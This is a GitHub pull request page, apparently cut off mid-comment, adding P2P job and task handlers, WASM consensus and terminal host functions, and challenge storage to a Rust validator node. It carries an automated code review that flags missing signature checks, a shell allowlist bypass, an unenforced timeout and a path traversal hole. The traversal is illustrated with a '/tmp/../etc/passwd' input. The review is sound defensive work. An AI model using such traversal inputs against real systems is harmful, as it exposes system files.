feat(infra): add P2P handlers, WASM host functions, and distributed storage for decentralized challenges#45
feat(infra): add P2P handlers, WASM host functions, and distributed storage for decentralized challenges#45
Conversation
… exec, and time host functions - Add consensus and terminal module declarations and re-exports in lib.rs - Add ConsensusPolicy and TerminalPolicy fields to InstanceConfig with defaults - Add ConsensusState and TerminalState fields to RuntimeState - Create consensus_state and terminal_state in instantiate() - Register exec, time, consensus, terminal, and sandbox host functions in linker
…tion registrations
…torage for decentralized challenges Implement comprehensive P2P infrastructure in platform-v2 so that future WASM challenges can operate end-to-end without any centralized server. This replaces the centralized HTTP/PostgreSQL patterns from term-challenge with P2P equivalents. WASM Runtime (wasm-runtime-interface): - Add consensus.rs: ConsensusPolicy, ConsensusState, ConsensusHostFunctions with platform_consensus namespace (get_epoch, get_validators, propose_weight, get_votes, get_state_hash, get_submission_count, get_block_height) - Add terminal.rs: TerminalPolicy, TerminalState, TerminalHostFunctions with platform_terminal namespace (terminal_exec, read_file, write_file, list_dir, get_time, random_seed) with path/command allow-listing - Implement SandboxHostFunctions HostFunctionRegistrar (sandbox.rs) with real Wasmtime linker registration for sandbox_exec, get_timestamp, log_message - Add ChallengeStorageBackend (storage.rs) backed by real LocalStorage from distributed-storage, replacing NoopStorageBackend for production use - Register ConsensusPolicy and TerminalPolicy in InstanceConfig and RuntimeState - Fix formatting across consensus.rs, sandbox.rs, terminal.rs P2P Consensus (p2p-consensus): - Extend ChainState with leaderboard, active_jobs, task_progress, and challenge_storage_roots fields for full challenge lifecycle tracking - Add JobRecord, JobStatus, TaskProgressRecord, LeaderboardEntry types - Add state methods: assign_job, complete_job, update_leaderboard, get_leaderboard, update_task_progress, update_challenge_storage_root, cleanup_stale_jobs — all with proper sequence increment - Add P2PMessage variants (appended at end for bincode compatibility): JobClaim, JobAssignment, DataRequest, DataResponse, TaskProgress, TaskResult, LeaderboardRequest, LeaderboardResponse, ChallengeUpdate, StorageProposal, StorageVote — with full message structs Validator Node (validator-node): - Handle all new P2P message types in handle_network_event() with proper logging and state updates (JobAssignment creates jobs, TaskProgress updates state, etc.) - Handle previously unmatched messages: StateRequest, StateResponse, WeightVote, PeerAnnounce (replacing catch-all debug log) - Add stale job cleanup periodic task (120s interval) - Update WasmChallengeExecutor to use InMemoryStorageBackend (upgraded from NoopStorageBackend) and wire ConsensusPolicy/TerminalPolicy into config Challenge SDK WASM (challenge-sdk-wasm): - Add platform_consensus extern block with all consensus host function imports - Add safe Rust wrappers: host_consensus_get_epoch, host_consensus_get_validators, host_consensus_propose_weight, host_consensus_get_votes, etc. - Fix minor formatting in host_functions.rs No breaking changes to existing EvaluationInput/EvaluationOutput serialization. New P2PMessage variants added at end of enum for backward compatibility.
… dependency Move ChallengeStorageBackend from wasm-runtime-interface/storage.rs to bins/validator-node/src/challenge_storage.rs. This resolves the cyclic dependency: platform-core -> wasm-runtime-interface -> distributed-storage -> platform-core. The ChallengeStorageBackend depends on distributed-storage types (LocalStorage, StorageKey, etc.) which validator-node already depends on directly, so it belongs there rather than in the generic WASM runtime crate. Add sha2 dependency to validator-node for the hash computation in propose_write(). Fix clippy needless_borrows_for_generic_args warnings by removing unnecessary & on hex::encode() calls.
📝 WalkthroughWalkthroughThis PR introduces a comprehensive job lifecycle and consensus framework for the validator node, adding support for challenge storage, job/task tracking, and new WASM host functions for consensus and terminal operations. It extends P2P messaging with eleven new message types, enhances state management with leaderboards and job records, and integrates policy-driven consensus and terminal execution capabilities into the WASM runtime. Changes
Sequence Diagram(s)sequenceDiagram
participant Validator as Validator Node
participant Consensus as Consensus Module
participant Storage as LocalStorage
participant WASM as WASM Runtime
Validator->>Consensus: Receive JobAssignment message
Consensus->>Consensus: Create JobRecord (submission_id, timeout_at, Pending)
Consensus->>Storage: Persist job record to state
Consensus->>Validator: Push state update
loop Every interval
Validator->>Consensus: Cleanup stale jobs (cleanup_stale_jobs)
Consensus->>Consensus: Identify jobs past timeout_at
Consensus->>Consensus: Mark as TimedOut, remove from active_jobs
Consensus->>Validator: Return cleaned job count
end
Validator->>Consensus: Receive TaskProgress message
Consensus->>Consensus: Create TaskProgressRecord (task_index, progress_pct)
Consensus->>Storage: Update task_progress collection
Consensus->>Validator: Refresh state hash
sequenceDiagram
participant Guest as WASM Guest
participant HostFunctions as Host Functions Registry
participant ConsensusState as Consensus State
participant TerminalState as Terminal State
participant Policy as Policy Checker
Guest->>HostFunctions: Call consensus_propose_weight(uid, weight)
HostFunctions->>Policy: Check consensus_policy.allow_weight_proposals
Policy-->>HostFunctions: Policy enabled?
HostFunctions->>ConsensusState: Increment weight_proposals_made
HostFunctions->>Policy: Check max_weight_proposals limit
Policy-->>HostFunctions: Limit exceeded?
alt Limit not exceeded
HostFunctions->>ConsensusState: Record proposed_weight
HostFunctions-->>Guest: Return Success (0)
else Limit exceeded
HostFunctions-->>Guest: Return ProposalLimitExceeded (-2)
end
Guest->>HostFunctions: Call terminal_exec(cmd)
HostFunctions->>Policy: Check terminal_policy.allowed_commands
Policy-->>HostFunctions: Command allowed?
HostFunctions->>Policy: Check max_executions limit
Policy-->>HostFunctions: Execution count OK?
alt All checks pass
HostFunctions->>TerminalState: Execute command (with timeout)
HostFunctions->>TerminalState: Update bytes_written
HostFunctions-->>Guest: Write SandboxExecResponse to WASM memory
else Policy violation
HostFunctions-->>Guest: Return TerminalHostStatus error
end
Estimated code review effort🎯 4 (Complex) | ⏱️ ~75 minutes Possibly related PRs
Poem
🚥 Pre-merge checks | ✅ 2 | ❌ 1❌ Failed checks (1 warning)
✅ Passed checks (2 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. ✨ Finishing Touches
🧪 Generate unit tests (beta)
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. Comment |
There was a problem hiding this comment.
Actionable comments posted: 11
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (1)
crates/p2p-consensus/src/state.rs (1)
237-261:⚠️ Potential issue | 🟠 Major
update_hashdoes not incorporate new state fields, weakening integrity verification.The
HashInputstruct only includessequence,epoch,validator_count,challenge_count,pending_count, andnetuid. The newly added fields —leaderboard,active_jobs,task_progress, andchallenge_storage_roots— are never reflected in the state hash. This meansapply_sync_state(line 745) cannot detect tampering with these fields since the hash verification won't catch modifications.Consider extending
HashInputto include counts or digests of the new collections:Proposed fix sketch
#[derive(Serialize)] struct HashInput { sequence: SequenceNumber, epoch: u64, validator_count: usize, challenge_count: usize, pending_count: usize, netuid: u16, + active_jobs_count: usize, + leaderboard_count: usize, + task_progress_count: usize, + storage_roots_count: usize, } let input = HashInput { sequence: self.sequence, epoch: self.epoch, validator_count: self.validators.len(), challenge_count: self.challenges.len(), pending_count: self.pending_evaluations.len(), netuid: self.netuid, + active_jobs_count: self.active_jobs.len(), + leaderboard_count: self.leaderboard.len(), + task_progress_count: self.task_progress.len(), + storage_roots_count: self.challenge_storage_roots.len(), };🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@crates/p2p-consensus/src/state.rs` around lines 237 - 261, The state hash in update_hash currently omits new fields (leaderboard, active_jobs, task_progress, challenge_storage_roots) so extend the HashInput used in update_hash to include deterministic representations of those fields (e.g., counts and/or a digest/hash of their contents) so mutations are reflected in state_hash; update the HashInput struct to add fields like leaderboard_count/leaderboard_digest, active_jobs_count/active_jobs_digest, task_progress_count/task_progress_digest, challenge_storage_roots_count/challenge_storage_roots_digest, populate them from self (using lengths and a stable serialization + hash for digests via the existing hash_data helper), and keep apply_sync_state verification working against the updated state_hash.
🧹 Nitpick comments (2)
crates/p2p-consensus/src/state.rs (1)
656-660:update_task_progresscallsupdate_hash()instead ofincrement_sequence()— inconsistent with sibling methods.All other mutation methods (
assign_job,complete_job,update_leaderboard,update_challenge_storage_root,cleanup_stale_jobs) callincrement_sequence(). This method only callsupdate_hash(), which won't increment the sequence number. If this is intentional (to reduce sequence churn for frequent progress updates), a brief comment explaining the rationale would help. Otherwise, consider aligning with the other methods.🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@crates/p2p-consensus/src/state.rs` around lines 656 - 660, The method update_task_progress currently calls update_hash() but all other mutating methods (assign_job, complete_job, update_leaderboard, update_challenge_storage_root, cleanup_stale_jobs) call increment_sequence(); update_task_progress should be changed to call increment_sequence() after inserting the record to keep sequence behavior consistent, or if the omission is intentional add a concise comment in update_task_progress explaining why sequence should not be incremented (e.g., to avoid sequence churn for frequent progress updates) so future readers understand the rationale.bins/validator-node/src/main.rs (1)
799-827: Stub handlers — several new message types are log-only with no processing.
StateRequest,StateResponse,WeightVote, andPeerAnnouncehandlers only log and discard the message. ForStateRequestin particular, the expected behavior is to respond with the current state. Consider adding TODO comments to track the remaining implementation work.Would you like me to open issues to track implementing the response logic for these message types?
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@bins/validator-node/src/main.rs` around lines 799 - 827, Handlers for P2PMessage::StateRequest, P2PMessage::StateResponse, P2PMessage::WeightVote, and P2PMessage::PeerAnnounce are currently no-ops that only debug-log and drop the message; add explicit TODO comments and stub call sites and implement immediate behavior: for P2PMessage::StateRequest(req) call a new or existing handle_state_request(req) that prepares and sends the current state response, for P2PMessage::StateResponse(resp) call handle_state_response(resp) to validate/merge remote state or enqueue for processing, for P2PMessage::WeightVote(wv) call handle_weight_vote(wv) to validate and apply or forward the vote, and for P2PMessage::PeerAnnounce(pa) call handle_peer_announce(pa) to update peer table and dial addresses; include clear TODO markers in each branch and return early only after invoking the appropriate handler so future work is tracked and the request/response path for StateRequest is functional.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@bins/validator-node/src/challenge_storage.rs`:
- Around line 42-46: The current hash construction in the block that creates a
Sha256 hasher (Sha256::new(), then hasher.update(challenge_id.as_bytes()),
hasher.update(key), hasher.update(value), hasher.finalize()) concatenates fields
without delimiters and can cause boundary collisions; change the hashing to
include unambiguous separators or length prefixes (e.g., write the length of
challenge_id, key, and value before each field or insert a fixed sentinel byte
between fields) so the input to hasher.update is canonical and
collision-resistant; update the code around the hasher usage (the hasher
variable and the three hasher.update(...) calls) to apply this length-prefix or
delimiter strategy and then finalize as before.
In `@bins/validator-node/src/main.rs`:
- Around line 874-897: The TaskProgress handler is mutating state without
verifying the progress.signature; before calling state.update_task_progress
(inside the P2PMessage::TaskProgress arm where TaskProgressRecord is built),
validate the signature on progress using the validator's public key and a
canonical serialization of the progress data (e.g., submission_id, challenge_id,
task_index, total_tasks, status, progress_pct, timestamp) and only call
state_manager.apply/update_task_progress if signature verification succeeds; if
verification fails, log and discard the message. Ensure you perform the check on
progress.signature and use the existing signature verification utility in the
codebase (or add one) so the verification occurs prior to creating/updating the
TaskProgressRecord and invoking state.update_task_progress.
- Around line 836-855: Replace the hardcoded 300_000 timeout in the
JobAssignment handler with a named constant (e.g., JOB_ASSIGNMENT_TIMEOUT_MS) to
improve clarity and maintainability: define the constant near related types or
at module scope and use it when computing JobRecord.timeout_at (currently set as
assignment.timestamp + 300_000) so it becomes assignment.timestamp +
JOB_ASSIGNMENT_TIMEOUT_MS; update any related comments or docs and leave
signature verification untouched since it's handled in
handle_gossipsub_message().
In `@crates/challenge-sdk-wasm/src/host_functions.rs`:
- Around line 234-242: The wrappers host_consensus_get_validators,
host_consensus_get_votes and host_consensus_get_state_hash treat a returned
status of 1 (ConsensusHostStatus::Disabled) as success and truncate the buffer;
update each function to treat status == 1 as an error (i.e., return Err(status))
rather than truncating/returning data — only treat genuinely successful status
values as success (e.g., status > 1 for payload-returning calls), and keep the
existing negative-error check; change the conditional around the unsafe
consensus_* call in host_consensus_get_validators, host_consensus_get_votes and
host_consensus_get_state_hash to explicitly return Err(status) when status == 1
(or otherwise not in the valid-success range) so disabled responses are not
misinterpreted as data.
In `@crates/wasm-runtime-interface/src/consensus.rs`:
- Around line 253-274: handle_propose_weight currently only checks uid and
weight are non-negative and then casts them to u16, causing silent truncation;
update handle_propose_weight to validate that both uid and weight are within
u16::MAX before casting (e.g., check uid <= u16::MAX and weight <= u16::MAX),
return ConsensusHostStatus::InvalidArgument.to_i32() if out of range, and only
then cast to u16 when pushing into
caller.data_mut().consensus_state.proposed_weights while leaving the other logic
(policy checks, weight_proposals_made increment) unchanged.
- Around line 30-39: The enum ConsensusHostStatus has a positive value for
Disabled which breaks the SDK convention that non-success statuses are negative;
change ConsensusHostStatus::Disabled to a negative value (e.g., -1 or another
unused negative code) and update any conversion/mapper (e.g., from_i32 or match
arms that map i32→ConsensusHostStatus) to reflect the new negative value so SDK
wrappers that treat status<0 as error work correctly; ensure no other variant
collisions occur when renumbering.
In `@crates/wasm-runtime-interface/src/sandbox.rs`:
- Around line 428-456: The current synchronous write_all to child.stdin after
spawning (in the block referencing cmd.spawn(), has_stdin, request.stdin,
write_all and child.stdin) can deadlock if the child fills stdout/stderr buffers
before reading stdin; move stdin writing off the main thread by spawning a
dedicated thread to take child.stdin, write_all the bytes, and then drop/close
it (or use wait_with_output which concurrently handles stdio) before entering
the existing timeout loop that polls child.try_wait() and uses wait_with_output;
ensure the writer thread is detached or joined appropriately and that errors
from the write are converted to SandboxExecError::ExecutionFailed so the
timeout/kill logic (start, timeout, child.kill,
SandboxExecError::ExecutionTimeout) still functions correctly.
In `@crates/wasm-runtime-interface/src/terminal.rs`:
- Around line 30-43: TerminalHostStatus::Disabled is currently set to a positive
value (1) which breaks the SDK's error-detection pattern (status < 0); change
the Disabled variant in the TerminalHostStatus enum to a negative error code
(e.g., -8 or another unused negative value) so it is treated as an error by SDK
wrappers like host_terminal_exec, and update any related docs/tests/constants
that assume the old value.
- Around line 139-147: The is_path_allowed function currently checks prefixes
with path.starts_with(p) which allows path traversal like "/tmp/../etc/passwd";
change the check to compare normalized/canonicalized paths: normalize the
incoming path (resolve "."/".." components and make it absolute) and normalize
the stored allowed_paths before comparison (or canonicalize both using
std::fs::canonicalize where possible), and on any canonicalization/error return
false; update the same prefix-check logic in the other occurrence of this
permission check so comparisons use normalized absolute paths rather than raw
starts_with.
- Around line 565-600: handle_terminal_random_seed currently uses
chrono::Utc::now() when fixed_timestamp_ms is None which yields
non-deterministic seeds across validators; change to only use deterministic
inputs (challenge_id and a deterministic per-call counter stored on
RuntimeState) and fail if fixed_timestamp_ms is not set or omit timestamp
entirely. Specifically: in handle_terminal_random_seed, remove the chrono::Utc
fallback and instead read a call counter field on RuntimeState (e.g., add or use
runtime_state.terminal_seed_counter), include that counter and challenge_id in
the Sha256 input (hasher.update(counter.to_le_bytes())), then increment and
persist the counter back to caller.data() before returning; if you must use a
timestamp require fixed_timestamp_ms to be Some and return
TerminalHostStatus::InternalError when it is None so seeds remain deterministic
across validators. Ensure the unique symbols mentioned
(handle_terminal_random_seed, fixed_timestamp_ms, RuntimeState,
terminal_seed_counter, write_wasm_memory) are updated accordingly.
- Around line 283-375: handle_terminal_exec currently validates only the first
token (command_name) but then runs the entire cmd_str via "sh -c", and it blocks
on child.wait_with_output(), allowing allowlist bypass and hanging; fix by (1)
rejecting or sanitizing any shell metacharacters in cmd_str or, better, parse
cmd_str into an argv vector and execute the binary directly
(Command::new(&argv[0]).args(&argv[1..])) so no shell interpretation occurs —
update the use of command_name/cmd_str parsing and the spawn call accordingly —
and (2) replace the blocking child.wait_with_output() with a nonblocking timeout
implementation (use child.try_wait() in a loop with
Instant::now()+Duration::from_millis(timeout_ms) and sleep small intervals,
killing the child via child.kill() if deadline exceeded, or run the child on a
background thread and join with a timeout) so timeout_ms is enforced; adjust
error returns/logs in handle_terminal_exec to reflect killed/timeouts.
---
Outside diff comments:
In `@crates/p2p-consensus/src/state.rs`:
- Around line 237-261: The state hash in update_hash currently omits new fields
(leaderboard, active_jobs, task_progress, challenge_storage_roots) so extend the
HashInput used in update_hash to include deterministic representations of those
fields (e.g., counts and/or a digest/hash of their contents) so mutations are
reflected in state_hash; update the HashInput struct to add fields like
leaderboard_count/leaderboard_digest, active_jobs_count/active_jobs_digest,
task_progress_count/task_progress_digest,
challenge_storage_roots_count/challenge_storage_roots_digest, populate them from
self (using lengths and a stable serialization + hash for digests via the
existing hash_data helper), and keep apply_sync_state verification working
against the updated state_hash.
---
Nitpick comments:
In `@bins/validator-node/src/main.rs`:
- Around line 799-827: Handlers for P2PMessage::StateRequest,
P2PMessage::StateResponse, P2PMessage::WeightVote, and P2PMessage::PeerAnnounce
are currently no-ops that only debug-log and drop the message; add explicit TODO
comments and stub call sites and implement immediate behavior: for
P2PMessage::StateRequest(req) call a new or existing handle_state_request(req)
that prepares and sends the current state response, for
P2PMessage::StateResponse(resp) call handle_state_response(resp) to
validate/merge remote state or enqueue for processing, for
P2PMessage::WeightVote(wv) call handle_weight_vote(wv) to validate and apply or
forward the vote, and for P2PMessage::PeerAnnounce(pa) call
handle_peer_announce(pa) to update peer table and dial addresses; include clear
TODO markers in each branch and return early only after invoking the appropriate
handler so future work is tracked and the request/response path for StateRequest
is functional.
In `@crates/p2p-consensus/src/state.rs`:
- Around line 656-660: The method update_task_progress currently calls
update_hash() but all other mutating methods (assign_job, complete_job,
update_leaderboard, update_challenge_storage_root, cleanup_stale_jobs) call
increment_sequence(); update_task_progress should be changed to call
increment_sequence() after inserting the record to keep sequence behavior
consistent, or if the omission is intentional add a concise comment in
update_task_progress explaining why sequence should not be incremented (e.g., to
avoid sequence churn for frequent progress updates) so future readers understand
the rationale.
| let mut hasher = Sha256::new(); | ||
| hasher.update(challenge_id.as_bytes()); | ||
| hasher.update(key); | ||
| hasher.update(value); | ||
| Ok(hasher.finalize().into()) |
There was a problem hiding this comment.
Hash over concatenated fields without delimiters can produce collisions.
SHA256(challenge_id || key || value) without length-prefixed or delimited fields is theoretically susceptible to boundary confusion (e.g., challenge_id="ab" + key=[0x63] produces the same hash input as challenge_id="abc" + key=[]). Practical risk is low if challenge IDs are UUIDs, but for correctness it's worth adding a separator or length prefix.
Proposed fix
let mut hasher = Sha256::new();
hasher.update(challenge_id.as_bytes());
+ hasher.update(b":");
hasher.update(key);
+ hasher.update(b":");
hasher.update(value);
Ok(hasher.finalize().into())📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| let mut hasher = Sha256::new(); | |
| hasher.update(challenge_id.as_bytes()); | |
| hasher.update(key); | |
| hasher.update(value); | |
| Ok(hasher.finalize().into()) | |
| let mut hasher = Sha256::new(); | |
| hasher.update(challenge_id.as_bytes()); | |
| hasher.update(b":"); | |
| hasher.update(key); | |
| hasher.update(b":"); | |
| hasher.update(value); | |
| Ok(hasher.finalize().into()) |
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@bins/validator-node/src/challenge_storage.rs` around lines 42 - 46, The
current hash construction in the block that creates a Sha256 hasher
(Sha256::new(), then hasher.update(challenge_id.as_bytes()), hasher.update(key),
hasher.update(value), hasher.finalize()) concatenates fields without delimiters
and can cause boundary collisions; change the hashing to include unambiguous
separators or length prefixes (e.g., write the length of challenge_id, key, and
value before each field or insert a fixed sentinel byte between fields) so the
input to hasher.update is canonical and collision-resistant; update the code
around the hasher usage (the hasher variable and the three hasher.update(...)
calls) to apply this length-prefix or delimiter strategy and then finalize as
before.
| P2PMessage::JobAssignment(assignment) => { | ||
| info!( | ||
| submission_id = %assignment.submission_id, | ||
| challenge_id = %assignment.challenge_id, | ||
| assigned_validator = %assignment.assigned_validator.to_hex(), | ||
| assigner = %assignment.assigner.to_hex(), | ||
| "Received job assignment" | ||
| ); | ||
| let job = JobRecord { | ||
| submission_id: assignment.submission_id.clone(), | ||
| challenge_id: assignment.challenge_id, | ||
| assigned_validator: assignment.assigned_validator, | ||
| assigned_at: assignment.timestamp, | ||
| timeout_at: assignment.timestamp + 300_000, | ||
| status: JobStatus::Pending, | ||
| }; | ||
| state_manager.apply(|state| { | ||
| state.assign_job(job); | ||
| }); | ||
| } |
There was a problem hiding this comment.
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash
# Search for signature verification patterns in the codebase
rg -n "verify.*signature|signature.*verify|verify_message|verify_signed" --type=rs -C3Repository: PlatformNetwork/platform-v2
Length of output: 97
🏁 Script executed:
#!/bin/bash
# Search for timeout constants and magic numbers related to 300000
rg -n "300000|300_000|timeout.*const|TIMEOUT.*=|Job.*timeout" --type=rs | head -30Repository: PlatformNetwork/platform-v2
Length of output: 97
🏁 Script executed:
#!/bin/bash
# Find where P2PMessage enum is defined and how it's processed
rg -n "enum P2PMessage|handle_network_event|process.*message" --type=rs -A5 | head -50Repository: PlatformNetwork/platform-v2
Length of output: 97
🏁 Script executed:
#!/bin/bash
# Search for signature verification patterns - look in .rs files
find bins/validator-node/src -name "*.rs" -exec grep -n "verify.*signature\|signature.*verify\|verify_message\|verify_signed" {} + 2>/dev/nullRepository: PlatformNetwork/platform-v2
Length of output: 53
🏁 Script executed:
#!/bin/bash
# Search for timeout constants and the 300_000 magic number
find bins/validator-node/src -name "*.rs" -exec grep -n "300_000\|TIMEOUT\|timeout.*const" {} + 2>/dev/null | head -40Repository: PlatformNetwork/platform-v2
Length of output: 170
🏁 Script executed:
#!/bin/bash
# Find P2PMessage enum definition and handler structure
find . -name "*.rs" -exec grep -l "enum P2PMessage\|handle_network_event" {} + 2>/dev/nullRepository: PlatformNetwork/platform-v2
Length of output: 143
🏁 Script executed:
#!/bin/bash
# Check the P2PMessage structure in messages.rs
cat crates/p2p-consensus/src/messages.rs | head -150Repository: PlatformNetwork/platform-v2
Length of output: 5110
🏁 Script executed:
#!/bin/bash
# Search for where messages are received/parsed in main.rs to see if validation happens before the handler
grep -n "handle_network_event\|received.*message\|P2PMessage::" bins/validator-node/src/main.rs | head -20Repository: PlatformNetwork/platform-v2
Length of output: 1042
🏁 Script executed:
#!/bin/bash
# Look for any network layer validation or message verification
find . -name "*.rs" -path "*/p2p*" -o -name "*.rs" -path "*/network*" 2>/dev/null | xargs grep -l "verify\|validate" 2>/dev/null | head -10Repository: PlatformNetwork/platform-v2
Length of output: 344
🏁 Script executed:
#!/bin/bash
# Get the JobAssignmentMessage structure definition
grep -A20 "pub struct JobAssignmentMessage" crates/p2p-consensus/src/messages.rsRepository: PlatformNetwork/platform-v2
Length of output: 740
🏁 Script executed:
#!/bin/bash
# Check the network.rs file for message validation/verification logic
cat crates/p2p-consensus/src/network.rs | head -200Repository: PlatformNetwork/platform-v2
Length of output: 6307
🏁 Script executed:
#!/bin/bash
# Search for signature verification implementation
grep -rn "verify.*signature\|validate.*signature" crates/p2p-consensus/src/ 2>/dev/nullRepository: PlatformNetwork/platform-v2
Length of output: 877
🏁 Script executed:
#!/bin/bash
# Search for SignedP2PMessage definition and usage
grep -rn "SignedP2PMessage\|struct Signed" crates/p2p-consensus/src/messages.rs | head -20Repository: PlatformNetwork/platform-v2
Length of output: 173
🏁 Script executed:
#!/bin/bash
# Look for where messages are validated after reception but before handler
grep -n "from_bytes\|deserialize\|receive\|handle_message" crates/p2p-consensus/src/network.rs | head -30Repository: PlatformNetwork/platform-v2
Length of output: 574
🏁 Script executed:
#!/bin/bash
# Check if there's validation logic around message processing
grep -B5 -A10 "P2PMessage::JobAssignment\|verify_signature.*assignment\|assignment.*verify" bins/validator-node/src/main.rsRepository: PlatformNetwork/platform-v2
Length of output: 824
🏁 Script executed:
#!/bin/bash
# Get the full SignedP2PMessage struct definition
sed -n '610,650p' crates/p2p-consensus/src/messages.rsRepository: PlatformNetwork/platform-v2
Length of output: 1123
🏁 Script executed:
#!/bin/bash
# Check how messages are actually dispatched in the event loop - look around line 432
sed -n '420,450p' bins/validator-node/src/main.rsRepository: PlatformNetwork/platform-v2
Length of output: 1355
🏁 Script executed:
#!/bin/bash
# Search for any validation or signature checks on P2PMessage before handler dispatch
grep -B10 "handle_network_event" bins/validator-node/src/main.rs | grep -E "verify|validate|signature|sign"Repository: PlatformNetwork/platform-v2
Length of output: 53
🏁 Script executed:
#!/bin/bash
# Confirm the pattern - check if Submission handler also doesn't verify signature
sed -n '723,760p' bins/validator-node/src/main.rsRepository: PlatformNetwork/platform-v2
Length of output: 1787
🏁 Script executed:
#!/bin/bash
# Check where SignedP2PMessage gets unwrapped/deserialized
grep -n "SignedP2PMessage\|verify.*signature" crates/p2p-consensus/src/network.rs | head -20Repository: PlatformNetwork/platform-v2
Length of output: 405
🏁 Script executed:
#!/bin/bash
# Get the full verify_message implementation
sed -n '420,460p' crates/p2p-consensus/src/network.rsRepository: PlatformNetwork/platform-v2
Length of output: 1549
🏁 Script executed:
#!/bin/bash
# Search for where verify_message is actually called
grep -rn "verify_message" crates/p2p-consensus/src/ bins/validator-node/src/Repository: PlatformNetwork/platform-v2
Length of output: 263
🏁 Script executed:
#!/bin/bash
# Look at the message deserialization flow - line 446 onwards
sed -n '440,500p' crates/p2p-consensus/src/network.rsRepository: PlatformNetwork/platform-v2
Length of output: 2485
Extract job assignment timeout to a named constant.
The assignment.timestamp + 300_000 is a hardcoded 5-minute timeout that should be extracted to a named constant for clarity and maintainability.
Signature verification is already handled at the network layer in handle_gossipsub_message(), which validates all incoming messages before they reach the handlers, so no additional verification is needed here.
Proposed constant extraction
+/// Default job assignment timeout in milliseconds (5 minutes)
+const JOB_ASSIGNMENT_TIMEOUT_MS: i64 = 300_000;
+
// ... in the handler:
- timeout_at: assignment.timestamp + 300_000,
+ timeout_at: assignment.timestamp + JOB_ASSIGNMENT_TIMEOUT_MS,🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@bins/validator-node/src/main.rs` around lines 836 - 855, Replace the
hardcoded 300_000 timeout in the JobAssignment handler with a named constant
(e.g., JOB_ASSIGNMENT_TIMEOUT_MS) to improve clarity and maintainability: define
the constant near related types or at module scope and use it when computing
JobRecord.timeout_at (currently set as assignment.timestamp + 300_000) so it
becomes assignment.timestamp + JOB_ASSIGNMENT_TIMEOUT_MS; update any related
comments or docs and leave signature verification untouched since it's handled
in handle_gossipsub_message().
| P2PMessage::TaskProgress(progress) => { | ||
| debug!( | ||
| submission_id = %progress.submission_id, | ||
| challenge_id = %progress.challenge_id, | ||
| validator = %progress.validator.to_hex(), | ||
| task_index = progress.task_index, | ||
| total_tasks = progress.total_tasks, | ||
| progress_pct = progress.progress_pct, | ||
| "Received task progress" | ||
| ); | ||
| let record = TaskProgressRecord { | ||
| submission_id: progress.submission_id.clone(), | ||
| challenge_id: progress.challenge_id, | ||
| validator: progress.validator, | ||
| task_index: progress.task_index, | ||
| total_tasks: progress.total_tasks, | ||
| status: progress.status, | ||
| progress_pct: progress.progress_pct, | ||
| updated_at: progress.timestamp, | ||
| }; | ||
| state_manager.apply(|state| { | ||
| state.update_task_progress(record); | ||
| }); | ||
| } |
There was a problem hiding this comment.
TaskProgress handler also processes state mutations without signature verification.
The TaskProgress handler creates a TaskProgressRecord and updates state via state.update_task_progress(record) without verifying the progress.signature. A malicious peer could forge progress updates for submissions it isn't assigned to evaluate.
Same guideline concern as the JobAssignment handler above.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@bins/validator-node/src/main.rs` around lines 874 - 897, The TaskProgress
handler is mutating state without verifying the progress.signature; before
calling state.update_task_progress (inside the P2PMessage::TaskProgress arm
where TaskProgressRecord is built), validate the signature on progress using the
validator's public key and a canonical serialization of the progress data (e.g.,
submission_id, challenge_id, task_index, total_tasks, status, progress_pct,
timestamp) and only call state_manager.apply/update_task_progress if signature
verification succeeds; if verification fails, log and discard the message.
Ensure you perform the check on progress.signature and use the existing
signature verification utility in the codebase (or add one) so the verification
occurs prior to creating/updating the TaskProgressRecord and invoking
state.update_task_progress.
| pub fn host_consensus_get_validators() -> Result<Vec<u8>, i32> { | ||
| let mut buf = vec![0u8; 65536]; | ||
| let status = unsafe { consensus_get_validators(buf.as_mut_ptr() as i32, buf.len() as i32) }; | ||
| if status < 0 { | ||
| return Err(status); | ||
| } | ||
| buf.truncate(status as usize); | ||
| Ok(buf) | ||
| } |
There was a problem hiding this comment.
Disabled status (positive 1) slips through the status < 0 error check, causing data corruption.
The host-side ConsensusHostStatus::Disabled has value 1 (positive). When the host returns 1 for a disabled consensus, these wrappers treat it as a successful response of 1 byte, truncating the zero-initialized buffer to a single byte and returning Ok(vec![0]). The caller will misinterpret garbage as valid validator/vote data.
This applies to host_consensus_get_validators and host_consensus_get_votes. The same class of bug exists for host_consensus_get_state_hash (Line 262) where status == 1 is treated as success, though the impact there is returning a zeroed hash rather than corrupt data.
🐛 Proposed fix: check for positive non-success status codes
pub fn host_consensus_get_validators() -> Result<Vec<u8>, i32> {
let mut buf = vec![0u8; 65536];
let status = unsafe { consensus_get_validators(buf.as_mut_ptr() as i32, buf.len() as i32) };
- if status < 0 {
+ if status < 0 || status == 1 {
+ // 1 = Disabled
return Err(status);
}
buf.truncate(status as usize);
Ok(buf)
} pub fn host_consensus_get_votes() -> Result<Vec<u8>, i32> {
let mut buf = vec![0u8; 65536];
let status = unsafe { consensus_get_votes(buf.as_mut_ptr() as i32, buf.len() as i32) };
- if status < 0 {
+ if status < 0 || status == 1 {
+ // 1 = Disabled
return Err(status);
}
buf.truncate(status as usize);
Ok(buf)
}Alternatively, consider a more robust fix: change ConsensusHostStatus::Disabled to a negative value (e.g., -10) in consensus.rs so all non-success statuses are negative, aligning with the error-detection pattern used throughout the SDK. The same issue exists for TerminalHostStatus::Disabled = 1 in terminal.rs.
Also applies to: 252-260
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@crates/challenge-sdk-wasm/src/host_functions.rs` around lines 234 - 242, The
wrappers host_consensus_get_validators, host_consensus_get_votes and
host_consensus_get_state_hash treat a returned status of 1
